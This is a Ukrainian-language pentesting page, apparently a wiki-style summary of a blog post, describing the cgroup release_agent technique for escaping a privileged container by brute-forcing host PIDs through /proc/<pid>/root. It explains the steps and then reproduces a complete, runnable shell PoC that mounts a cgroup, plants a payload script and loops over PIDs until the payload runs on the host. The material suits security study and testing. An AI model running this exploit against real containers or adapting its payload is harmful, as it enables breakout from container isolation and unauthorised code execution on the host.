release_agent exploit - Relative Paths to PIDs

Для отримання додаткової інформації перевірте блог за посиланням https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html. Це лише резюме:

Техніка описує метод виконання коду хоста зсередини контейнера, подолання труднощів, викликаних конфігураціями драйвера зберігання, які приховують шлях файлової системи контейнера на хості, такими як Kata Containers або специфічні налаштування devicemapper.

Ключові кроки:

1. Локалізація ідентифікаторів процесів (PID): Використовуючи символічне посилання /proc/<pid>/root у псевдо-файловій системі Linux, будь-який файл всередині контейнера може бути доступний відносно файлової системи хоста. Це обминає необхідність знати шлях файлової системи контейнера на хості.

2. Пошук PID: Використовується метод грубої сили для пошуку PID на хості. Це робиться шляхом послідовної перевірки наявності конкретного файлу за адресою /proc/<pid>/root/<file>. Коли файл знаходиться, це вказує на те, що відповідний PID належить процесу, що виконується всередині цільового контейнера.

3. Запуск виконання: Вгаданий шлях PID записується у файл cgroups release_agent. Ця дія запускає виконання release_agent. Успіх цього кроку підтверджується перевіркою наявності вихідного файлу.

Процес експлуатації

Процес експлуатації включає більш детальний набір дій, спрямованих на виконання корисного навантаження на хості шляхом вгадування правильного PID процесу, що виконується всередині контейнера. Ось як це відбувається:

1. Ініціалізація середовища: Скрипт корисного навантаження (payload.sh) готується на хості, і створюється унікальний каталог для маніпуляцій з cgroup.

2. Підготовка корисного навантаження: Скрипт корисного навантаження, який містить команди для виконання на хості, записується та робиться виконуваним.

3. Налаштування cgroup: Cgroup монтується та налаштовується. Прапорець notify_on_release встановлюється, щоб забезпечити виконання корисного навантаження, коли cgroup звільняється.

4. Пошук PID: Цикл проходить через потенційні PID, записуючи кожен вгаданий PID у файл release_agent. Це ефективно встановлює скрипт корисного навантаження як release_agent.

5. Запуск та перевірка виконання: Для кожного PID записується cgroup.procs cgroup, запускаючи виконання release_agent, якщо PID правильний. Цикл триває, поки не буде знайдено вихід скрипта корисного навантаження, що вказує на успішне виконання.

PoC з блогу:

#!/bin/sh

OUTPUT_DIR="/"
MAX_PID=65535
CGROUP_NAME="xyx"
CGROUP_MOUNT="/tmp/cgrp"
PAYLOAD_NAME="${CGROUP_NAME}_payload.sh"
PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}"
OUTPUT_NAME="${CGROUP_NAME}_payload.out"
OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}"

# Run a process for which we can search for (not needed in reality, but nice to have)
sleep 10000 &

# Prepare the payload script to execute on the host
cat > ${PAYLOAD_PATH} << __EOF__
#!/bin/sh

OUTPATH=\$(dirname \$0)/${OUTPUT_NAME}

# Commands to run on the host<
ps -eaf > \${OUTPATH} 2>&1
__EOF__

# Make the payload script executable
chmod a+x ${PAYLOAD_PATH}

# Set up the cgroup mount using the memory resource cgroup controller
mkdir ${CGROUP_MOUNT}
mount -t cgroup -o memory cgroup ${CGROUP_MOUNT}
mkdir ${CGROUP_MOUNT}/${CGROUP_NAME}
echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release

# Brute force the host pid until the output path is created, or we run out of guesses
TPID=1
while [ ! -f ${OUTPUT_PATH} ]
do
if [ $((${TPID} % 100)) -eq 0 ]
then
echo "Checking pid ${TPID}"
if [ ${TPID} -gt ${MAX_PID} ]
then
echo "Exiting at ${MAX_PID} :-("
exit 1
fi
fi
# Set the release_agent path to the guessed pid
echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent
# Trigger execution of the release_agent
sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs"
TPID=$((${TPID} + 1))
done

# Wait for and cat the output
sleep 1
echo "Done! Output:"
cat ${OUTPUT_PATH}